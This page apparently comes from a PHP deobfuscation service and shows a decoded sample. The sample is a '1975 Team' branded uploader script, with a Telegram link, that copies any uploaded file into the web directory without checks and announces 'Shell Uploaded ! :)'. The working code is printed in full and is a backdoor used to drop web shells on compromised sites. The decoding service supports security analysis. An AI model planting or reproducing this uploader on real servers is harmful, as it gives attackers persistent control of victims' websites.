Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<html> <title> 1975 Team </title> <center> <h1> 1975 Team </h1> <?php echo '<form act..
Decoded Output download
<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>
Did this file decode correctly?
Original Code
<html>
<title> 1975 Team </title>
<center>
<h1> 1975 Team </h1>
<?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}
?>
<bgcolor="#000"><center><pre><font size="4px color="white"><p>[ <a href="https://t.me/team1975"><font color="red" face="courier">Telegram</font></a>]</p></font></pre></center>
<div class="typewriter">
</html>
Function Calls
None |
Stats
MD5 | 145b7cbd93cc6843baaf2bd1bd908e71 |
Eval Count | 0 |
Decode Time | 115 ms |